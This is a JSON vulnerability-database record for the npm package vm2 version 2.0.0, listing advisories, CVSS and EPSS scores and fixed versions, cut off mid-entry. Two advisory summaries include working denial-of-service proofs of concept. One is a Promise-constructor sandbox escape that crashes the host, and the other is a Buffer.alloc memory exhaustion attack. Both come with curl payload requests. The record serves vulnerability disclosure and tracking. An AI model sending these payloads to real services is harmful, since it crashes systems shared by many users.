{"url":"http://public2.vulnerablecode.io/api/packages/538473?format=json","purl":"pkg:npm/vm2@2.0.0","type":"npm","namespace":"","name":"vm2","version":"2.0.0","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":"3.11.4","latest_non_vulnerable_version":"3.11.4","affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/109601?format=json","vulnerability_id":"VCID-1p1e-z4rv-1bfn","summary":"vm2 vulnerable to Arbitrary Code Execution\nThe package vm2 before 3.9.10 is vulnerable to Arbitrary Code Execution due to the usage of prototype lookup for the WeakMap.prototype.set method. Exploiting this vulnerability leads to access to a host object and a sandbox compromise.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-25893","reference_id":"","reference_type":"","scores":[{"value":"0.00495","scoring_system":"epss","scoring_elements":"0.66103","published_at":"2026-06-04T12:55:00Z"},{"value":"0.00495","scoring_system":"epss","scoring_elements":"0.66137","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00495","scoring_system":"epss","scoring_elements":"0.6615","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00495","scoring_system":"epss","scoring_elements":"0.66165","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00495","scoring_system":"epss","scoring_elements":"0.66155","published_at":"2026-06-09T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-25893"},{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2"},{"reference_url":"https://github.com/patriksimek/vm2/issues/444","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/issues/444"},{"reference_url":"https://github.com/patriksimek/vm2/pull/445","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/pull/445"},{"reference_url":"https://github.com/patriksimek/vm2/pull/445/commits/3a9876482be487b78a90ac459675da7f83f46d69","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/pull/445/commits/3a9876482be487b78a90ac459675da7f83f46d69"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-25893","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-25893"},{"reference_url":"https://security.snyk.io/vuln/SNYK-JS-VM2-2990237","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://security.snyk.io/vuln/SNYK-JS-VM2-2990237"},{"reference_url":"https://github.com/advisories/GHSA-4w2j-2rg4-5mjw","reference_id":"GHSA-4w2j-2rg4-5mjw","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-4w2j-2rg4-5mjw"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/146724?format=json","purl":"pkg:npm/vm2@3.9.10","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3krt-qmqx-q7c6"},{"vulnerability":"VCID-4dwc-b66t-cuf8"},{"vulnerability":"VCID-4w6q-km6k-5bct"},{"vulnerability":"VCID-75hb-ytcw-4khu"},{"vulnerability":"VCID-8s8x-85t4-m7cg"},{"vulnerability":"VCID-d6mv-1b7h-5fef"},{"vulnerability":"VCID-ej5b-1m7b-hkf8"},{"vulnerability":"VCID-f2j1-dxbm-sfgc"},{"vulnerability":"VCID-gqm5-bhj5-k3cf"},{"vulnerability":"VCID-gqum-k4dn-fbe7"},{"vulnerability":"VCID-hhxv-v932-cuf7"},{"vulnerability":"VCID-hv69-paun-p7d7"},{"vulnerability":"VCID-jv3n-721k-z3h7"},{"vulnerability":"VCID-ku6f-9qqg-aqe6"},{"vulnerability":"VCID-mvte-m5qa-budj"},{"vulnerability":"VCID-ng7k-8x8k-pye1"},{"vulnerability":"VCID-pytn-u4me-9bee"},{"vulnerability":"VCID-rd8s-311d-8qcq"},{"vulnerability":"VCID-t48f-zxgy-m7az"},{"vulnerability":"VCID-t5ax-32h1-13ha"},{"vulnerability":"VCID-v8ca-8eew-aqah"},{"vulnerability":"VCID-wpfa-k33c-zff4"},{"vulnerability":"VCID-ws53-29ft-u7dp"},{"vulnerability":"VCID-xe8d-un3q-myc9"},{"vulnerability":"VCID-zeup-86es-xkc4"},{"vulnerability":"VCID-zz97-v3rg-1bck"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@3.9.10"}],"aliases":["CVE-2022-25893","GHSA-4w2j-2rg4-5mjw"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-1p1e-z4rv-1bfn"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/92081?format=json","vulnerability_id":"VCID-3krt-qmqx-q7c6","summary":"vm2 has a Sandbox Escape via Promise Constructor Unhandled Rejection (Process Crash DoS)\n### Summary\nA sandbox escape vulnerability in vm2 v3.10.5 allows any sandboxed code to crash the host Node.js process via a single Promise constructor that triggers an unhandled rejection propagating to the host. The fix for CVE-2026-22709 (v3.10.2) only sanitized the `onRejected` callback in `.then()` and `.catch()` overrides and did not address the executor-to-unhandledRejection path.\n\n### Details\nWhen sandboxed code creates a `Promise` whose executor sets `Error.name` to a `Symbol()` and then accesses `.stack`, V8's internal `FormatStackTrace` (C++) attempts `Symbol.toString()`, which throws a **host-realm TypeError**. Because this error originates inside the Promise executor and no `.catch()` handler is attached, it becomes an **unhandled rejection** that propagates to the host process.\n\n- `lib/setup-sandbox.js:38` — `localPromise` wraps the native `Promise` constructor but does not wrap the executor in try-catch.\n- `lib/setup-sandbox.js:165-230` — `resetPromiseSpecies` and the `.then()`/`.catch()` overrides sanitize the `onRejected` callback chains, but do not intercept unhandled rejections originating from the executor itself.\n\nThe CVE-2026-22709 patch (v3.10.2) sanitized `.then()` and `.catch()` callback chains but left the executor-to-unhandledRejection path completely open.\n\n**Root Cause**: Promise executor errors are not caught/sanitized before they can propagate as unhandled rejections to the host process, causing an immediate process crash.\n\n**`allowAsync: false` does not help**: This setting only blocks `async`/`await` syntax and overrides `.then()`/`.catch()` to throw. The `Promise` constructor itself is still callable. Worse, because `.catch()` is blocked, any rejection from the executor is *guaranteed* to be unhandled — making `allowAsync: false` paradoxically more dangerous than `true` for this vulnerability.\n\n### PoC\n\n**Library-level PoC (Node.js script — primary):**\n```javascript\nconst { VM } = require(\"vm2\");\n\n// Works with ANY allowAsync setting — both true and false\nconst vm = new VM({ timeout: 5000, allowAsync: false });\n\ntry {\n const result = vm.run(`\n new Promise(function(r, j) {\n var e = new Error();\n e.name = Symbol();\n e.stack;\n });\n `);\n console.log(\"Result:\", result); // Reaches here (returns Promise object)\n} catch (err) {\n console.log(\"Caught:\", err); // Never executed\n}\n\nconsole.log(\"After try-catch\"); // Also prints normally\n\n// But on the next microtask tick:\n// [UnhandledPromiseRejection: TypeError: Cannot convert a Symbol value to a string]\n// Exit code: 1\n//\n// try-catch cannot help — vm.run() returns synchronously,\n// the rejection fires asynchronously outside any catch scope.\n//\n// NOTE: allowAsync: false only blocks async/await syntax and\n// .then()/.catch() method calls. The Promise constructor itself\n// still executes, and the unhandled rejection still propagates.\n// In fact, allowAsync: false makes it WORSE — .catch() is blocked,\n// so the rejection is guaranteed to be unhandled.\n```\n\n**HTTP demonstration (web service impact):**\n```bash\n# 1. Confirm server is running\ncurl -s http://localhost:3000/api/execute \\\n -X POST -H \"Content-Type: application/json\" \\\n -d '{\"code\":\"\\\"alive\\\"\"}'\n# => {\"output\":[],\"errors\":[],\"result\":\"\\\"alive\\\"\",\"executionTime\":1}\n\n# 2. Send payload — server process will crash\ncurl -s -X POST http://localhost:3000/api/execute \\\n -H \"Content-Type: application/json\" \\\n -d '{\"code\":\"new Promise(function(r,j){var e=new Error();e.name=Symbol();e.stack})\"}'\n\n# 3. Server is dead (connection refused until restart)\ncurl -s http://localhost:3000/ # => connection refused\n```\n\n### Impact\n- **DoS**: A single request crashes the entire host Node.js process. All concurrent users lose service immediately. In Node.js 15+, unhandled rejections terminate the process by default — no special configuration is required for the crash to occur.\n- **Persistent DoS despite restart policies**: Even when container orchestration (Docker restart policy, Kubernetes liveness probes, PM2, etc.) automatically restarts the crashed process, an attacker can send repeated requests to crash the process again before it fully recovers. In our testing, a single `curl` request caused the Docker container to restart (confirmed via `StartedAt` timestamp change), and sending the next request immediately after restart triggered another crash. This creates a **continuous denial-of-service loop** where the service never becomes available to legitimate users — each restart is met with another crash before any real request can be served.\n- **Amplification**: A single HTTP request (~150 bytes) terminates the entire host process serving all users. The cost to the attacker is negligible compared to the impact.\n- **Scope**: **All applications using vm2, regardless of `allowAsync` setting.** `allowAsync: false` only blocks `async`/`await` syntax and `.then()`/`.catch()` method calls — the `Promise` constructor itself still executes, and the unhandled rejection still propagates. In fact, `allowAsync: false` makes the vulnerability *worse* because `.catch()` is blocked, guaranteeing the rejection is always unhandled.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44001","reference_id":"","reference_type":"","scores":[{"value":"0.00052","scoring_system":"epss","scoring_elements":"0.16727","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00052","scoring_system":"epss","scoring_elements":"0.16663","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00052","scoring_system":"epss","scoring_elements":"0.16646","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00052","scoring_system":"epss","scoring_elements":"0.16768","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00052","scoring_system":"epss","scoring_elements":"0.16764","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44001"},{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2"},{"reference_url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.0","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.0"},{"reference_url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-hw58-p9xv-2mjh","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-18T15:16:50Z/"}],"url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-hw58-p9xv-2mjh"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44001","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44001"},{"reference_url":"https://github.com/advisories/GHSA-99p7-6v5w-7xg8","reference_id":"GHSA-99p7-6v5w-7xg8","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-99p7-6v5w-7xg8"},{"reference_url":"https://github.com/advisories/GHSA-hw58-p9xv-2mjh","reference_id":"GHSA-hw58-p9xv-2mjh","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-hw58-p9xv-2mjh"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114499?format=json","purl":"pkg:npm/vm2@3.11.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-t48f-zxgy-m7az"},{"vulnerability":"VCID-t5ax-32h1-13ha"},{"vulnerability":"VCID-wpfa-k33c-zff4"},{"vulnerability":"VCID-zeup-86es-xkc4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@3.11.0"}],"aliases":["CVE-2026-44001","GHSA-hw58-p9xv-2mjh"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-3krt-qmqx-q7c6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/44872?format=json","vulnerability_id":"VCID-4dwc-b66t-cuf8","summary":"Improper Control of Dynamically-Managed Code Resources\nvm2 is a sandbox that can run untrusted code with allow listed Node's built-in modules. Prior to version 3.9.15, vm2 was not properly handling host objects passed to `Error.prepareStackTrace` in case of unhandled async errors. A threat actor could bypass the sandbox protections to gain remote code execution rights on the host running the sandbox. This vulnerability was patched in the release of version 3.9.15 of vm2. There are no known workarounds.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-29017.json","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-29017.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-29017","reference_id":"","reference_type":"","scores":[{"value":"0.74958","scoring_system":"epss","scoring_elements":"0.98891","published_at":"2026-06-05T12:55:00Z"},{"value":"0.74958","scoring_system":"epss","scoring_elements":"0.98889","published_at":"2026-06-09T12:55:00Z"},{"value":"0.74958","scoring_system":"epss","scoring_elements":"0.9889","published_at":"2026-06-08T12:55:00Z"},{"value":"0.74958","scoring_system":"epss","scoring_elements":"0.98892","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-29017"},{"reference_url":"https://gist.github.com/seongil-wi/2a44e082001b959bfe304b62121fb76d","reference_id":"","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-02-10T16:10:48Z/"}],"url":"https://gist.github.com/seongil-wi/2a44e082001b959bfe304b62121fb76d"},{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2"},{"reference_url":"https://github.com/patriksimek/vm2/commit/d534e5785f38307b70d3aac1945260a261a94d50","reference_id":"","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-02-10T16:10:48Z/"}],"url":"https://github.com/patriksimek/vm2/commit/d534e5785f38307b70d3aac1945260a261a94d50"},{"reference_url":"https://github.com/patriksimek/vm2/issues/515","reference_id":"","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-02-10T16:10:48Z/"}],"url":"https://github.com/patriksimek/vm2/issues/515"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2185374","reference_id":"2185374","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2185374"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-29017","reference_id":"CVE-2023-29017","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-29017"},{"reference_url":"https://github.com/advisories/GHSA-7jxr-cg7f-gpgv","reference_id":"GHSA-7jxr-cg7f-gpgv","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-7jxr-cg7f-gpgv"},{"reference_url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-7jxr-cg7f-gpgv","reference_id":"GHSA-7jxr-cg7f-gpgv","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-02-10T16:10:48Z/"}],"url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-7jxr-cg7f-gpgv"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/64547?format=json","purl":"pkg:npm/vm2@3.9.15","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3krt-qmqx-q7c6"},{"vulnerability":"VCID-4w6q-km6k-5bct"},{"vulnerability":"VCID-75hb-ytcw-4khu"},{"vulnerability":"VCID-8s8x-85t4-m7cg"},{"vulnerability":"VCID-d6mv-1b7h-5fef"},{"vulnerability":"VCID-ej5b-1m7b-hkf8"},{"vulnerability":"VCID-f2j1-dxbm-sfgc"},{"vulnerability":"VCID-gqm5-bhj5-k3cf"},{"vulnerability":"VCID-gqum-k4dn-fbe7"},{"vulnerability":"VCID-hhxv-v932-cuf7"},{"vulnerability":"VCID-hv69-paun-p7d7"},{"vulnerability":"VCID-ku6f-9qqg-aqe6"},{"vulnerability":"VCID-mvte-m5qa-budj"},{"vulnerability":"VCID-ng7k-8x8k-pye1"},{"vulnerability":"VCID-pytn-u4me-9bee"},{"vulnerability":"VCID-rd8s-311d-8qcq"},{"vulnerability":"VCID-t48f-zxgy-m7az"},{"vulnerability":"VCID-t5ax-32h1-13ha"},{"vulnerability":"VCID-v8ca-8eew-aqah"},{"vulnerability":"VCID-wpfa-k33c-zff4"},{"vulnerability":"VCID-ws53-29ft-u7dp"},{"vulnerability":"VCID-xe8d-un3q-myc9"},{"vulnerability":"VCID-zeup-86es-xkc4"},{"vulnerability":"VCID-zz97-v3rg-1bck"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@3.9.15"}],"aliases":["CVE-2023-29017","GHSA-7jxr-cg7f-gpgv"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-4dwc-b66t-cuf8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/94882?format=json","vulnerability_id":"VCID-4w6q-km6k-5bct","summary":"vm2 Sandbox Access to Host Buffer.alloc Allows timeout Bypass Resulting in Memory Exhaustion\n### Summary\nSandboxed code can call `Buffer.alloc()` with an arbitrary size to allocate memory directly on the host heap. Because `Buffer.alloc` is a synchronous C++ native call, vm2's `timeout` option cannot interrupt it. A single request can exhaust host memory and crash the process with a `FATAL ERROR: Reached heap limit`.\n\n### Details\nIn `lib/vm.js:58`, `Buffer` is exposed to the sandbox through the `HOST` object. The bridge proxy (`lib/bridge.js`) passes `Buffer.alloc()` calls to the host without any size validation.\n\nKey technical distinction from regular JavaScript memory exhaustion (e.g., `while(true) a.push(...)`):\n- **JavaScript loops**: V8 can interrupt via timeout — vm2's `timeout` option works\n- **`Buffer.alloc(N)`**: Executes as a single synchronous C++ call — V8 timeout has no opportunity to interrupt\n\nThis means:\n1. `timeout: 5000` does NOT protect against this attack\n2. A single call allocates the entire requested size at once\n3. In memory-constrained environments (Docker, Lambda, Kubernetes pods), this causes immediate OOM crash\n\nTested amplification factor: ~100 bytes HTTP request — 1,000,000:1 or greater (100 bytes request to 100MB+ host heap allocation).\n\n### PoC\n\n**Library-level PoC (Node.js script — primary):**\n```javascript\nconst { VM } = require(\"vm2\");\nconst vm = new VM({ timeout: 5000 });\n\n// Buffer.alloc bypasses timeout — allocates 100MB on host heap\nconst result = vm.run(`Buffer.alloc(1024*1024*100).length`);\nconsole.log(result); // 104857600 — timeout had no effect\n\n// Control test — JavaScript loop IS caught by timeout\ntry {\n vm.run(`var a=[]; while(true) a.push(1)`);\n} catch(e) {\n console.log(e.message); // \"Script execution timed out after 5000ms\"\n}\n```\n\n**HTTP demonstration (OOM crash):**\n```bash\n# 1. Confirm server is running\ncurl -s http://localhost:3000/api/execute \\\n -X POST -H \"Content-Type: application/json\" \\\n -d '{\"code\":\"\\\"alive\\\"\"}'\n# => {\"result\":\"\\\"alive\\\"\"}\n\n# 2. Send Buffer.alloc payload — process crashes with OOM\ncurl -s -X POST http://localhost:3000/api/execute \\\n -H \"Content-Type: application/json\" \\\n -d '{\"code\":\"Buffer.alloc(1024*1024*100).length\"}'\n# => empty response (process died)\n\n# 3. Check server logs:\n# FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory\n\n# Control test — JavaScript loop IS caught by timeout:\ncurl -s -X POST http://localhost:3000/api/execute \\\n -H \"Content-Type: application/json\" \\\n -d '{\"code\":\"var a=[]; while(true) a.push(1)\"}'\n# => {\"errors\":[\"Script execution timed out after 5000ms\"]}\n# Server stays alive — timeout works for JS, but NOT for Buffer.alloc\n```\n\n### Impact\n- **DoS**: A single HTTP request crashes the host Node.js process via OOM. The `timeout` option provides no protection.\n- **Environment-dependent severity**:\n - **Memory-constrained environments** (Docker with memory limits, Kubernetes pods, Lambda): The allocation exceeds the memory limit, causing immediate process termination via OOM. This is the primary threat scenario — `FATAL ERROR: Reached heap limit` was confirmed in testing.\n - **Unconstrained environments**: The allocation succeeds and memory is reclaimed by GC after the request completes, resulting in temporary performance degradation rather than a crash.\n- **Scope**: All applications using vm2. Default configuration is vulnerable. Memory-constrained environments (Docker, Kubernetes, Lambda) are most severely impacted.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44004","reference_id":"","reference_type":"","scores":[{"value":"0.00052","scoring_system":"epss","scoring_elements":"0.16727","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00052","scoring_system":"epss","scoring_elements":"0.16663","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00052","scoring_system":"epss","scoring_elements":"0.16646","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00052","scoring_system":"epss","scoring_elements":"0.16768","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00052","scoring_system":"epss","scoring_elements":"0.16764","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44004"},{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2"},{"reference_url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.0","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.0"},{"reference_url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-6785-pvv7-mvg7","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-13T18:07:58Z/"}],"url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-6785-pvv7-mvg7"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44004","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44004"},{"reference_url":"https://github.com/advisories/GHSA-6785-pvv7-mvg7","reference_id":"GHSA-6785-pvv7-mvg7","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-6785-pvv7-mvg7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114499?format=json","purl":"pkg:npm/vm2@3.11.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-t48f-zxgy-m7az"},{"vulnerability":"VCID-t5ax-32h1-13ha"},{"vulnerability":"VCID-wpfa-k33c-zff4"},{"vulnerability":"VCID-zeup-86es-xkc4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@3.11.0"}],"aliases":["CVE-2026-44004","GHSA-6785-pvv7-mvg7"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-4w6q-km6k-5bct"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/45182?format=json","vulnerability_id":"VCID-75hb-ytcw-4khu","summary":"Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')\nvm2 is a sandbox that can run untrusted code with Node's built-in modules. In versions 3.9.17 and lower of vm2 it was possible to get a read-write reference to the node `inspect` method and edit options for `console.log`. As a result a threat actor can edit options for the `console.log` command. This vulnerability was patched in the release of version `3.9.18` of `vm2`. Users are advised to upgrade. Users unable to upgrade may make the `inspect` method readonly with `vm.readonly(inspect)` after creating a 